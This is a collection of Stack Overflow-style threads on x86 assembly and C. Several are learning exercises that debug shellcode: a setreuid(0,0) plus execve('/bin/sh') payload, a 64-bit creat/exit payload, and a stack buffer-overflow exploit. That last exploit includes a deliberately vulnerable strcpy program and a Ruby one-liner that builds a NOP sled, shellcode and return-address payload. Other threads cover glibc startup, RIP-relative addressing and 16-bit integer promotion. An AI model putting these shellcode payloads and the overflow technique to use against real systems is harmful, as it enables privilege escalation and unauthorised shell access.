Executing shell code using a function pointer present in Union - c

I am trying to inject shellcode into a char buffer and execute it through a function pointer. Both the buffer and the function pointer are members of the same union. Below is the shellcode I am trying to execute:
\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68
0: 31 c0 xor eax, eax
2: b0 46 mov al, 0x46 ; setreuid (70)
4: 31 db xor ebx, ebx ; real uid
6: 31 c9 xor ecx, ecx ; effective uid
8: cd 80 int 0x80 ; setreuid(0, 0)
a: eb 16 jmp 0x22 ; jump to call at end
c: 5b pop ebx ; get address of "/bin/sh"
d: 31 c0 xor eax, eax
f: 88 43 07 mov BYTE PTR[ebx + 0x7], al ; zero terminate "/bin/sh"
12: 89 5b 08 mov DWORD PTR[ebx + 0x8], ebx ; + address of "/bin/sh"
15: 89 43 0c mov DWORD PTR[ebx + 0xc], eax ; + NULL pointer
18: b0 0b mov al, 0x0b ; execve (11)
1a: 8d 4b 08 lea ecx, [ebx + 0x8] ; load argv (ptr to "/bin/sh")
1d: 8d 53 0c lea edx, [ebx + 0xc] ; load envp (NULL)
20: cd 80 int 0x80 ; execve("/bin/sh", ["/bin/sh", NULL], [NULL])
22: e8 e5 ff ff ff call 0x0c ; push address on the stack
27: "/bin/sh" ; and jump back
union array_or_function_pointer
{
char string[128];
void (*callback)(void);
};
void trialversion()
{
printf("This is a trial version. Please purchase the full version to enable all features!\n");
}
int main(int argc, char *argv[])
{
FILE *fp;
union array_or_function_pointer obj;
fp = fopen(argv[1], "r");
obj.callback = trialversion;
obj.callback();
fread(obj.string, 128, 1, fp);
obj.callback();
fclose(fp);
return 0;
}
The shellcode is not executed and I get a segmentation fault, as shown below. I compiled with -z execstack.
gcc -g -fno-stack-protector -z execstack sample.c -o sample
harsha@hv-XPS:~/ass6$ ./sample pass_junk.txt
This is a trial version. Please purchase the full version to enable all features!
Segmentation fault (core dumped)
The problem seems to be that the program is interpreting the bytes of the shellcode as an address.

Usually a pointer to function variable is implemented as memory containing the address of the first instruction of the function to be called. You're putting instructions directly in obj, not an address.
To get this sort of test exploit to work, you would need to both get the injected instructions somewhere into memory, and also put the address of the memory containing those instructions into obj.callback. But this will be tricky because most operating systems use Address Space Layout Randomization to make it difficult to predict exactly where objects in the stack will be.

Add sizeof(void(*)()) dummy bytes (eg. \x90\x90\x90\x90) at the beginning of your shellcode.
Then:
#include <stdio.h>
union array_or_function_pointer
{
char code[/* size */];
void(*callback)(void);
};
void foo(void) { puts("foo()"); }
int main(int argc, char **argv)
{
union array_or_function_pointer obj;
obj.callback = foo;
obj.callback();
FILE *fp = fopen(argv[1], "rb");
fread(obj.code, 1, /* size */, fp);
fclose(fp);
obj.callback = (void (*)(void))(&obj.callback + 1); // the code is located *behind*
obj.callback(); // the pointer value.
}

Related

How is main() called? Call to main() inside __libc_start_main()

I am trying to understand the call to main() inside __libc_start_main(). I know one of the parameters of __libc_start_main() is the address of main(). But, I am not able to figure out how is main() being called inside __libc_start_main() as there is no Opcode CALL or JMP. I see the following disassembly right before execution jumps to main().
0x7ffff7ded08b <__libc_start_main+203>: lea rax,[rsp+0x20]
0x7ffff7ded090 <__libc_start_main+208>: mov QWORD PTR fs:0x300,rax
=> 0x7ffff7ded099 <__libc_start_main+217>: mov rax,QWORD PTR [rip+0x1c3e10] # 0x7ffff7fb0eb0
I wrote a simple "Hello, World!!" in C. In the assembly above:
The execution jumps to main() right after instruction at address 0x7ffff7ded099.
Why is the MOV (to RAX) instruction causing a jump to main()?
Well, of course those instructions are not the ones that cause the call to main. I am not sure how you are stepping through those instructions, but if you are using GDB, you should use stepi instead of nexti.
I don't know why this happens precisely (some strange GDB or x86 quirk?) so I only speak from personal experience, but when reverse-engineering ELF binaries, I occasionally find that the nexti command executes several instructions before breaking. In your case, it misses a few movs before the actual call rax to call main().
What you can do to remediate this is to either use stepi, or to dump more code and then explicitly tell GDB to set breakpoints:
(gdb) x/20i
0x7ffff7ded08b <__libc_start_main+203>: lea rax,[rsp+0x20]
0x7ffff7ded090 <__libc_start_main+208>: mov QWORD PTR fs:0x300,rax
=> 0x7ffff7ded099 <__libc_start_main+217>: mov rax,QWORD PTR [rip+0x1c3e10] # 0x7ffff7fb0eb0
... more lines ...
... find call rax ...
(gdb) b *0x7ffff7dedXXX <= replace this
(gdb) continue
Here's what __libc_start_main() on my system does to call main():
21b6f: 48 8d 44 24 20 lea rax,[rsp+0x20] ; start preparing args
21b74: 64 48 89 04 25 00 03 mov QWORD PTR fs:0x300,rax
21b7b: 00 00
21b7d: 48 8b 05 24 93 3c 00 mov rax,QWORD PTR [rip+0x3c9324]
21b84: 48 8b 74 24 08 mov rsi,QWORD PTR [rsp+0x8]
21b89: 8b 7c 24 14 mov edi,DWORD PTR [rsp+0x14]
21b8d: 48 8b 10 mov rdx,QWORD PTR [rax]
21b90: 48 8b 44 24 18 mov rax,QWORD PTR [rsp+0x18] ; get address of main
21b95: ff d0 call rax ; actual call to main()
21b97: 89 c7 mov edi,eax
21b99: e8 32 16 02 00 call 431d0 <exit@@GLIBC_2.2.5> ; exit(result of main)
The first three instructions are the same that you show. At the moment of call rax, rax will contain the address of main. After calling main, the result is moved into edi (first argument) and exit(result) is called.
Looking at glibc's source code for __libc_start_main(), we can see that this is exactly what happens:
/* ... */
#ifdef HAVE_CLEANUP_JMP_BUF
int not_first_call;
not_first_call = setjmp ((struct __jmp_buf_tag *) unwind_buf.cancel_jmp_buf);
if (__glibc_likely (! not_first_call))
{
/* ... a bunch of stuff ... */
/* Run the program. */
result = main (argc, argv, __environ MAIN_AUXVEC_PARAM);
}
else
{
/* ... a bunch of stuff ... */
}
#else
/* Nothing fancy, just call the function. */
result = main (argc, argv, __environ MAIN_AUXVEC_PARAM);
#endif
exit (result);
}
In my case I can see from the disassembly that HAVE_CLEANUP_JMP_BUF was defined when my glibc was compiled, so the actual call to main() is the one inside the if. I also suspect this is the case for your glibc.

How does this program know the exact location where this string is stored?

I have disassembled a C program with Radare2. Inside this program there are many calls to scanf like the following:
0x000011fe 488d4594 lea rax, [var_6ch]
0x00001202 4889c6 mov rsi, rax
0x00001205 488d3df35603. lea rdi, [0x000368ff] ; "%d" ; const char *format
0x0000120c b800000000 mov eax, 0
0x00001211 e86afeffff call sym.imp.__isoc99_scanf ; int scanf(const char *format)
0x00001216 8b4594 mov eax, dword [var_6ch]
0x00001219 83f801 cmp eax, 1 ; rsi ; "ELF\x02\x01\x01"
0x0000121c 740a je 0x1228
Here scanf has the address of the string "%d" passed to it from the line lea rdi, [0x000368ff]. I'm assuming 0x000368ff is the location of "%d" in the executable file because if I restart Radare2 in debugging mode (r2 -d ./exec) then lea rdi, [0x000368ff] is replaced by lea rdi, [someMemoryAddress].
If lea rdi, [0x000368ff] is what's hard coded in the file, then how does the instruction change to the actual memory address when run?
Radare is tricking you, what you see is not the real instruction, it has been simplified for you.
The real instruction is:
0x00001205 488d3df3560300 lea rdi, qword [rip + 0x356f3]
0x0000120c b800000000 mov eax, 0
This is a typical position independent lea. The string to use is stored in your binary at the offset 0x000368ff, but since the executable is position independent, the real address needs to be calculated at runtime. Since the next instruction is at offset 0x0000120c, you know that, no matter where the binary is loaded in memory, the address you want will be rip + (0x000368ff - 0x0000120c) = rip + 0x356f3, which is what you see above.
When doing static analysis, since Radare does not know the base address of the binary in memory, it simply calculates 0x0000120c + 0x356f3 = 0x000368ff. This makes reverse engineering easier, but can be confusing since the real instruction is different.
As an example, the following program:
#include <stdio.h>
int main(void) {
puts("Hello world!");
}
When compiled produces:
6b4: 48 8d 3d 99 00 00 00 lea rdi,[rip+0x99]
6bb: e8 a0 fe ff ff call 560 <puts@plt>
So rip + 0x99 = 0x6bb + 0x99 = 0x754, and if we take a look at offset 0x754 in the binary with hd:
$ hd -s 0x754 -n 16 a.out
00000754 48 65 6c 6c 6f 20 77 6f 72 6c 64 21 00 00 00 00 |Hello world!....|
00000764
The full instruction is
48 8d 3d f3 56 03 00
This instruction is literally
lea rdi, [rip + 0x000356f3]
with a rip relative addressing mode. The instruction pointer rip has the value 0x0000120c when the instruction is executed, thus rdi receives the desired value 0x000368ff.
If this is not the real address, it is possible that your program is a position-independent executable (PIE) which is subject to relocation. Since the address is encoded using a rip-relative addressing mode, no relocation is needed and the address is correct, regardless of where the binary is loaded.

How can I force the size of an int for debugging purposes?

I have two builds for a piece of software I'm developing, one for an embedded system where the size of an int is 16 bits, and another for testing on the desktop where the size of an int is 32 bits. I am using fixed width integer types from <stdint.h>, but integer promotion rules still depend on the size of an int.
Ideally I would like something like the following code to print 65281 (integer promotion to 16 bits) instead of 4294967041 (integer promotion to 32 bits) because of integer promotion, so that it exactly matches the behavior on the embedded system. I want to be sure that code which gives one answer during testing on my desktop gives the exact same answer on the embedded system. A solution for either GCC or Clang would be fine.
#include <stdio.h>
#include <stdint.h>
int main(void){
uint8_t a = 0;
uint8_t b = -1;
printf("%u\n", a - b);
return 0;
}
EDIT:
The example I gave might not have been the best example, but I really do want integer promotion to be to 16 bits instead of 32 bits. Take the following example:
#include <stdio.h>
#include <stdint.h>
#include <inttypes.h>
int main(void){
uint16_t a = 0;
uint16_t b = 1;
uint16_t c = a - 2; // "-2": 65534
uint16_t d = (a - b) / (a - c);
printf("%" PRIu16 "\n", d);
return 0;
}
The output is 0 on a 32-bit system because of truncation from integer division after promotion to a (signed) int, as opposed to 32767.
The best answer so far seems to be to use an emulator, which is not what I was hoping for, but I guess it does make sense. It does seem like it should be theoretically possible for a compiler to generate code that behaves as if the size of an int were 16 bits, but I guess it shouldn't be too surprising that there's no easy way to do this in practice, and there's probably not much demand for such a mode and any necessary runtime support.
EDIT 2:
This is what I've explored so far: there is in fact a version of GCC which targets the i386 in 16-bit mode at https://github.com/tkchia/gcc-ia16. The output is a DOS COM file, which can be run in DOSBox. For instance, the two files:
test16.c
#include <stdint.h>
uint16_t result;
void test16(void){
uint16_t a = 0;
uint16_t b = 1;
uint16_t c = a - 2; // "-2": 65534
result = (a - b) / (a - c);
}
main.c
#include <stdio.h>
#include <stdint.h>
#include <inttypes.h>
extern uint16_t result;
void test16(void);
int main(void){
test16();
printf("result: %" PRIu16"\n", result);
return 0;
}
can be compiled with
$ ia16-elf-gcc -Wall test16.c main.c -o a.com
to produce a.com which can be run in DOSBox.
D:\>a
result: 32767
Looking into things a little further, ia16-elf-gcc does in fact produce a 32-bit elf as an intermediate, although the final link output by default is a COM file:
$ ia16-elf-gcc -Wall -c test16.c -o test16.o
$ file test16.o
test16.o: ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped
I can force it to link with main.c compiled with regular GCC, but not surprisingly, the resulting executable segfaults.
$ gcc -m32 -c main.c -o main.o
$ gcc -m32 -Wl,-m,elf_i386,-s,-o,outfile test16.o main.o
$ ./outfile
Segmentation fault (core dumped)
From a post here, it seems like it should theoretically be possible to link the 16-bit code output from ia16-elf-gcc to 32-bit code, although I'm not actually sure how. Then there is also the issue of actually running 16-bit code on a 64-bit OS. More ideal would be a compiler that still uses regular 32-bit/64-bit registers and instructions for performing the arithmetic, but emulates the arithmetic through library calls similar to how for instance a uint64_t is emulated on a (non-64-bit) microcontroller.
The closest I could find for actually running 16-bit code on x86-64 is here, and that seems experimental/completely unmaintained. At this point, just using an emulator is starting to seem like the best solution, but I will wait a little longer and see if anyone else has any ideas.
EDIT 3
I'm going to go ahead and accept antti's answer, although it's not the answer I was hoping to hear. If anyone is interested in what the output of ia16-elf-gcc is (I'd never even heard of ia16-elf-gcc before), here is the disassembly:
$ objdump -M intel -mi386 -Maddr16,data16 -S test16.o > test16.s
Notice that you must specify that it is 16 bit code, otherwise objdump interprets it as 32-bit code, which maps to different instructions (see further down).
test16.o: file format elf32-i386
Disassembly of section .text:
00000000 <test16>:
0: 55 push bp ; save frame pointer
1: 89 e5 mov bp,sp ; copy SP to frame pointer
3: 83 ec 08 sub sp,0x8 ; allocate 4 * 2bytes on stack
6: c7 46 fe 00 00 mov WORD PTR [bp-0x2],0x0 ; uint16_t a = 0
b: c7 46 fc 01 00 mov WORD PTR [bp-0x4],0x1 ; uint16_t b = 1
10: 8b 46 fe mov ax,WORD PTR [bp-0x2] ; ax = a
13: 83 c0 fe add ax,0xfffe ; ax -= 2
16: 89 46 fa mov WORD PTR [bp-0x6],ax ; uint16_t c = ax = a - 2
19: 8b 56 fe mov dx,WORD PTR [bp-0x2] ; dx = a
1c: 8b 46 fc mov ax,WORD PTR [bp-0x4] ; ax = b
1f: 29 c2 sub dx,ax ; dx -= b
21: 89 56 f8 mov WORD PTR [bp-0x8],dx ; temp = dx = a - b
24: 8b 56 fe mov dx,WORD PTR [bp-0x2] ; dx = a
27: 8b 46 fa mov ax,WORD PTR [bp-0x6] ; ax = c
2a: 29 c2 sub dx,ax ; dx -= c (= a - c)
2c: 89 d1 mov cx,dx ; cx = dx = a - c
2e: 8b 46 f8 mov ax,WORD PTR [bp-0x8] ; ax = temp = a - b
31: 31 d2 xor dx,dx ; clear dx
33: f7 f1 div cx ; dx:ax /= cx (unsigned divide)
35: 89 c0 mov ax,ax ; (?) ax = ax
37: 89 c0 mov ax,ax ; (?) ax = ax
39: a3 00 00 mov ds:0x0,ax ; ds[0] = ax
3c: 90 nop
3d: 89 c0 mov ax,ax ; (?) ax = ax
3f: 89 ec mov sp,bp ; restore saved SP
41: 5d pop bp ; pop saved frame pointer
42: 16 push ss ; push ss
43: 1f pop ds ; ds = ss
44: c3 ret
Debugging the program in GDB, this instruction causes the segfault
movl $0x46c70000,-0x2(%esi)
Which is the first two move instructions for setting the value of a and b interpreted with the instruction decoded in 32-bit mode. The relevant disassembly (not specifying 16-bit mode) is as follows:
$ objdump -M intel -S test16.o > test16.s && cat test16.s
test16.o: file format elf32-i386
Disassembly of section .text:
00000000 <test16>:
0: 55 push ebp
1: 89 e5 mov ebp,esp
3: 83 ec 08 sub esp,0x8
6: c7 46 fe 00 00 c7 46 mov DWORD PTR [esi-0x2],0x46c70000
d: fc cld
The next step would be trying to figure out a way to put the processor into 16-bit mode. It doesn't even have to be real mode (google searches mostly turn up results for x86 16-bit real mode), it can even be 16-bit protected mode. But at this point, using an emulator definitely seems like the best option, and this is more for my curiosity. This is all also specific to x86. For reference here's the same file compiled in 32-bit mode, which has an implicit promotion to a 32-bit signed int (from running gcc -m32 -c test16.c -o test16_32.o && objdump -M intel -S test16_32.o > test16_32.s):
test16_32.o: file format elf32-i386
Disassembly of section .text:
00000000 <test16>:
0: 55 push ebp ; save frame pointer
1: 89 e5 mov ebp,esp ; copy SP to frame pointer
3: 83 ec 10 sub esp,0x10 ; allocate 4 * 4bytes on stack
6: 66 c7 45 fa 00 00 mov WORD PTR [ebp-0x6],0x0 ; uint16_t a = 0
c: 66 c7 45 fc 01 00 mov WORD PTR [ebp-0x4],0x1 ; uint16_t b = 1
12: 0f b7 45 fa movzx eax,WORD PTR [ebp-0x6] ; eax = a
16: 83 e8 02 sub eax,0x2 ; eax -= 2
19: 66 89 45 fe mov WORD PTR [ebp-0x2],ax ; uint16_t c = (uint16_t) (a-2)
1d: 0f b7 55 fa movzx edx,WORD PTR [ebp-0x6] ; edx = a
21: 0f b7 45 fc movzx eax,WORD PTR [ebp-0x4] ; eax = b
25: 29 c2 sub edx,eax ; edx -= b
27: 89 d0 mov eax,edx ; eax = edx (= a - b)
29: 0f b7 4d fa movzx ecx,WORD PTR [ebp-0x6] ; ecx = a
2d: 0f b7 55 fe movzx edx,WORD PTR [ebp-0x2] ; edx = c
31: 29 d1 sub ecx,edx ; ecx -= edx (= a - c)
33: 99 cdq ; EDX:EAX = EAX sign extended (= a - b)
34: f7 f9 idiv ecx ; EDX:EAX /= ecx
36: 66 a3 00 00 00 00 mov ds:0x0,ax ; ds:[0x0] (result, not yet relocated) = (uint16_t) ax
3c: 90 nop
3d: c9 leave ; esp = ebp (restore stack pointer), pop ebp
3e: c3 ret
You can't, unless you find some very special compiler. It would break absolutely everything, including your printf call. The code generation in the 32-bit compiler might not even be able to produce the 16-bit arithmetic code as it is not commonly needed.
Have you considered using an emulator instead?
You need an entire runtime environment including all the necessary libraries to share the ABI you're implementing.
If you want to run your 16-bit code on a 32-bit system, your most likely chance of success is to run it in a chroot that has a comparable runtime environment, possibly using qemu-user-static if you need ISA translation too. That said, I'm not sure that any of the platforms supported by QEMU has a 16-bit ABI.
It might be possible to write yourself a set of 16-bit shim libraries, backed by your platform's native libraries - but I suspect the effort would outweigh the benefit to you.
Note that for the specific case of running 32-bit x86 binaries on a 64-bit amd64 host, Linux kernels are often configured with dual-ABI support (you still need the appropriate 32-bit libraries, of course).
You could make the code itself be more aware about the data sizes it is handling, by for example doing:
printf("%hu\n", a - b);
From fprintf's docs:
h
Specifies that a following d, i, o, u, x, or X conversion specifier applies to a short int or unsigned short int argument (the argument will have been promoted according to the integer promotions, but its value shall be converted to short int or unsigned short int before printing);

Shellcode Segmentation Fault error when run from exploitable program

BITS 64
section .text
global _start
_start:
jmp short two
one:
pop rbx
xor al,al
xor cx,cx
mov al,8
mov cx,0755
int 0x80
xor al,al
inc al
xor bl,bl
int 0x80
two:
call one
db 'H'
This is my assembly code.
Then I used two commands: "nasm -f elf64 newdir.s -o newdir.o" and "ld newdir.o -o newdir". I ran ./newdir and it worked fine, but when I extracted the opcodes and tried to test this shellcode using the following C program, it did not work (no segmentation fault). I compiled it with the command gcc newdir -z execstack
#include <stdio.h>
char sh[]="\xeb\x16\x5b\x30\xc0\x66\x31\xc9\xb0\x08\x66\xb9\xf3\x02\xcd\x80\x30\xc0\xfe\xc0\x30\xdb\xcd\x80\xe8\xe5\xff\xff\xff\x48";
void main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) sh;
(int)(*func)();
}
objdump -d newdir
newdir: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: eb 16 jmp 400098 <two>
0000000000400082 <one>:
400082: 5b pop %rbx
400083: 30 c0 xor %al,%al
400085: 66 31 c9 xor %cx,%cx
400088: b0 08 mov $0x8,%al
40008a: 66 b9 f3 02 mov $0x2f3,%cx
40008e: cd 80 int $0x80
400090: 30 c0 xor %al,%al
400092: fe c0 inc %al
400094: 30 db xor %bl,%bl
400096: cd 80 int $0x80
0000000000400098 <two>:
400098: e8 e5 ff ff ff callq 400082 <one>
40009d: 48 rex.W
When I run ./a.out, I get something like what is shown in the photo. I am attaching a photo because I can't explain what is happening.
P.S. My problem is resolved, but I wanted to know where things were going wrong, so I used a debugger. The result is below:
(gdb) list
1 char shellcode[] = "\xeb\x16\x5b\x30\xc0\x66\x31\xc9\xb0\x08\x66\xb9\xf3\x02\xcd\x80\x30\xc0\xfe\xc0\x30\xdb\xcd\x80\xe8\xe5\xff\xff\xff\x48";
2 int main (int argc, char **argv)
3 {
4 int (*ret)();
5 ret = (int(*)())shellcode;
6
7 (int)(*ret)();
8 }
(gdb) disassemble main
Dump of assembler code for function main:
0x00000000000005fa <+0>: push %rbp
0x00000000000005fb <+1>: mov %rsp,%rbp
0x00000000000005fe <+4>: sub $0x20,%rsp
0x0000000000000602 <+8>: mov %edi,-0x14(%rbp)
0x0000000000000605 <+11>: mov %rsi,-0x20(%rbp)
0x0000000000000609 <+15>: lea 0x200a20(%rip),%rax # 0x201030 <shellcode>
0x0000000000000610 <+22>: mov %rax,-0x8(%rbp)
0x0000000000000614 <+26>: mov -0x8(%rbp),%rdx
0x0000000000000618 <+30>: mov $0x0,%eax
0x000000000000061d <+35>: callq *%rdx
0x000000000000061f <+37>: mov $0x0,%eax
0x0000000000000624 <+42>: leaveq
0x0000000000000625 <+43>: retq
End of assembler dump.
(gdb) b 7
Breakpoint 1 at 0x614: file test.c, line 7.
(gdb) run
Starting program: /root/Desktop/Progs/shell/a.out
Breakpoint 1, main (argc=1, argv=0x7fffffffe2b8) at test.c:7
7 (int)(*ret)();
(gdb) info registers rip
rip 0x555555554614 0x555555554614 <main+26>
(gdb) x/5i $rip
=> 0x555555554614 <main+26>: mov -0x8(%rbp),%rdx
0x555555554618 <main+30>: mov $0x0,%eax
0x55555555461d <main+35>: callq *%rdx
0x55555555461f <main+37>: mov $0x0,%eax
0x555555554624 <main+42>: leaveq
(gdb) s
(Control got stuck here, so I pressed Ctrl+C)
^C
Program received signal SIGINT, Interrupt.
0x0000555555755048 in shellcode ()
(gdb) x/5i 0x0000555555755048
=> 0x555555755048 <shellcode+24>: callq 0x555555755032 <shellcode+2>
0x55555575504d <shellcode+29>: rex.W add %al,(%rax)
0x555555755050: add %al,(%rax)
0x555555755052: add %al,(%rax)
0x555555755054: add %al,(%rax)
Here is the debugging information. I am not able to find where control goes wrong. If you need more info, please ask.
Below is a working example using x86-64; which could be further optimized for size. That last 0x00 null is ok for the purpose of executing the shellcode.
assemble & link:
$ nasm -felf64 -g -F dwarf pushpam_001.s -o pushpam_001.o && ld pushpam_001.o -o pushpam_001
Code:
BITS 64
section .text
global _start
_start:
jmp short two
one:
pop rdi ; pathname
xor rax, rax
add al, 85 ; creat syscall 64-bit Linux
xor rsi, rsi
add si, 0755 ; mode: NASM reads 0755 as decimal 755 (0x2f3); write 0o755 for octal
syscall
xor rax, rax
add ax, 60
xor rdi, rdi
syscall
two:
call one
db 'H',0
objdump:
pushpam_001: file format elf64-x86-64
0000000000400080 <_start>:
400080: eb 1c jmp 40009e <two>
0000000000400082 <one>:
400082: 5f pop rdi
400083: 48 31 c0 xor rax,rax
400086: 04 55 add al,0x55
400088: 48 31 f6 xor rsi,rsi
40008b: 66 81 c6 f3 02 add si,0x2f3
400090: 0f 05 syscall
400092: 48 31 c0 xor rax,rax
400095: 66 83 c0 3c add ax,0x3c
400099: 48 31 ff xor rdi,rdi
40009c: 0f 05 syscall
000000000040009e <two>:
40009e: e8 df ff ff ff 48 00
.....H.
encoding extraction: There are many other ways to do this.
$ for i in `objdump -d pushpam_001 | grep "^ " | cut -f2`; do echo -n '\x'$i; done; echo
\xeb\x1c\x5f\x48\x31\xc0\x04\x55\x48\x31\xf6\x66\x81\xc6\xf3\x02\x0f\x05\x48\x31\xc0\x66\x83\xc0\x3c\x48\x31\xff\x0f\x05\xe8\xdf\xff\xff\xff\x48\x00\x.....H.
C shellcode.c - partial
...
unsigned char code[] = \
"\xeb\x1c\x5f\x48\x31\xc0\x04\x55\x48\x31\xf6\x66\x81\xc6\xf3\x02\x0f\x05\x48\x31\xc0\x66\x83\xc0\x3c\x48\x31\xff\x0f\x05\xe8\xdf\xff\xff\xff\x48\x00";
...
final:
./shellcode
--wxrw---t 1 david david 0 Jan 31 12:25 H
If int 0x80 in 64-bit code was the only problem, building your C test with gcc -fno-pie -no-pie would have worked, because then char sh[] would be in the low 32 bits of virtual address space, so system calls that truncate pointers to 32 bits would still work.
Run your program under strace to see what system calls it actually makes. (Except that strace decodes int 0x80 syscalls incorrectly in 64-bit code, decoding as if you'd used the 64-bit syscall ABI. The call numbers and arg registers are different.) But at least you can see the system-call return values (which will be -EFAULT for 32-bit creat with a truncated 64-bit pointer.)
You can also just gdb to single-step and check the system call return values. Having strace decode the system-call inputs is really nice, though, so I'd recommend porting your code to use the 64-bit ABI, and then it would just work.
Also, it would actually be able to exploit 64-bit processes where the buffer overflow is in memory at an address outside the low 32 bits. (e.g. like the stack). So yes, you should really stop using int 0x80 or stick to 32-bit code.
You're also depending on registers being zeroed before your code runs, like they are on process startup, but not when called from anywhere else.
xor al,al before mov al,8 is completely pointless, because xor-zeroing al doesn't clear upper bytes. Writing 32-bit registers clears the upper 32, but not writing 8 or 16 bit registers. And if it did, you wouldn't need the xor-zeroing before using mov which is also write-only.
If you want to set RAX=8 without any zero bytes in the machine code, you can
push 8 / pop rax (3 bytes)
xor eax,eax / mov al,8 (4 bytes)
Or given a zeroed rcx register, lea eax, [rcx+8] (3 bytes)
Setting CX to 0755 isn't so simple, because the constant doesn't fit in an imm8. Your 16-bit mov is a good choice (or would have been if you'd zeroed rcx first).
xor ecx,ecx
lea eax, [rcx+8] ; SYS_creat = 8 from unistd_32.h
mov cx, 0755 ; mode (NASM reads this as decimal 755; write 0o755 for octal)
int 0x80 ; invoke 32-bit ABI
xor ebx,ebx
lea eax, [rbx+1] ; SYS_exit = 1
int 0x80

Syscall inside shellcode won't run

Note: I've already asked this question in Stackoverflow in Portuguese Language: https://pt.stackoverflow.com/questions/76571/seguran%C3%A7a-syscall-dentro-de-shellcode-n%C3%A3o-executa. But it seems to be a really hard question, so this question is just a translation of the question in portuguese.
I'm studying Information Security and performing some experiments trying to exploit a classic case of buffer overflow.
I've succeeded in the creation of the shellcode, its injection inside the vulnerable program and in its execution. My problem is that a syscall to execve() to get a shell does not work.
In more details:
This is the code of the vulnerable program (compiled on Ubuntu 15.04 x86-64 with the gcc flags "-fno-stack-protector -z execstack -g" and with ASLR turned off):
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
int do_bof(char *exploit) {
char buf[128];
strcpy(buf, exploit);
return 1;
}
int main(int argc, char *argv[]) {
if(argc < 2) {
puts("Usage: bof <any>");
return 0;
}
do_bof(argv[1]);
puts("Failed to exploit.");
return 0;
}
This is a small assembly program that spawns a shell and then exits. Note that this code works on its own. That is, if I assemble, link and run this code alone, it works.
global _start
section .text
_start:
jmp short push_shell
starter:
pop rdi
mov al, 59
xor rsi, rsi
xor rdx, rdx
xor rcx, rcx
syscall
xor al, al
mov BYTE [rdi], al
mov al, 60
syscall
push_shell:
call starter
shell:
db "/bin/sh"
This is the output of objdump -d -M intel for the above program, from which the shellcode was extracted (note: the output is in Portuguese):
spawn_shell.o: formato do arquivo elf64-x86-64
Desmontagem da seção .text:
0000000000000000 <_start>:
0: eb 16 jmp 18 <push_shell>
0000000000000002 <starter>:
2: 5f pop rdi
3: b0 3b mov al,0x3b
5: 48 31 f6 xor rsi,rsi
8: 48 31 d2 xor rdx,rdx
b: 48 31 c9 xor rcx,rcx
e: 0f 05 syscall
10: 30 c0 xor al,al
12: 88 07 mov BYTE PTR [rdi],al
14: b0 3c mov al,0x3c
16: 0f 05 syscall
0000000000000018 <push_shell>:
18: e8 e5 ff ff ff call 2 <starter>
000000000000001d <shell>:
1d: 2f (bad)
1e: 62 (bad)
1f: 69 .byte 0x69
20: 6e outs dx,BYTE PTR ds:[rsi]
21: 2f (bad)
22: 73 68 jae 8c <shell+0x6f>
This command produces the payload, which injects the shellcode along with the needed NOP sled and the return address that will overwrite the original return address:
ruby -e 'print "\x90" * 103 + "\xeb\x13\x5f\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\x30\xc0\x88\x07\xb0\x3c\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\xd0\xd8\xff\xff\xff\x7f"'
So far, I've already debugged my program with the shellcode injected very carefully, paying attention to the RIP register seeing where the execution goes wrong. I've discovered that:
The return address is correctly overwritten and the execution jumps to my shellcode.
The execution goes alright until the "e:" line of my assembly program, where the syscall to execve() happens.
The syscall simply does not work, even with the register correctly set up to do a syscall. Strangely, after this line, the RAX and RCX register bits are all set up.
The result is that execution reaches the unconditional jump (the call) that pushes the address of the shell string again, and an infinite loop starts until the program crashes with a SEGFAULT.
That's the main problem: The syscall won't work.
Some notes:
Some would say that my "/bin/sh" string needs to be null terminated. Well, it does not seem to be necessary: nasm seems to add a null byte implicitly, and my assembly program works, as I stated.
Remember it's a 64 bit shellcode.
This shellcode works in the following code:
char shellcode[] = "\xeb\x0b\x5f\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
int main() {
void (*func)();
func = (void (*)()) shellcode;
(void)(func)();
}
What's wrong with my shellcode?
EDIT 1:
Thanks to Jester's answer, the first problem was solved. Additionally, I discovered that shellcode is not required to work on its own. The new assembly code for the shellcode is:
spawn_shell: formato do arquivo elf64-x86-64
Desmontagem da seção .text:
0000000000400080 <_start>:
400080: eb 1e jmp 4000a0 <push_shell>
0000000000400082 <starter>:
400082: 5f pop %rdi
400083: 48 31 c0 xor %rax,%rax
400086: 88 47 07 mov %al,0x7(%rdi)
400089: b0 3b mov $0x3b,%al
40008b: 48 31 f6 xor %rsi,%rsi
40008e: 48 31 d2 xor %rdx,%rdx
400091: 48 31 c9 xor %rcx,%rcx
400094: 0f 05 syscall
400096: 48 31 c0 xor %rax,%rax
400099: 48 31 ff xor %rdi,%rdi
40009c: b0 3c mov $0x3c,%al
40009e: 0f 05 syscall
00000000004000a0 <push_shell>:
4000a0: e8 dd ff ff ff callq 400082 <starter>
4000a5: 2f (bad)
4000a6: 62 (bad)
4000a7: 69 .byte 0x69
4000a8: 6e outsb %ds:(%rsi),(%dx)
4000a9: 2f (bad)
4000aa: 73 68 jae 400114 <push_shell+0x74>
If I assemble and link it, it does not work, but if I inject it into another program as a payload, it does! Why? Because if I run this program alone, it tries to terminate an already NULL-terminated string "/bin/sh". The OS seems to do some initial setup even for assembly programs. This is not the case when I inject the shellcode. Moreover, the real reason my syscall did not succeed is that the "/bin/sh" string was not NULL-terminated at runtime; it worked as a standalone program only because in that case it was NULL-terminated.
Therefore, the fact that your shellcode runs fine as a standalone program does not prove that it works.
The exploitation was successful... at least in GDB. Now I have a new problem: the exploit works inside GDB, but not outside it.
$ gdb -q bof3
Lendo símbolos de bof3...concluído.
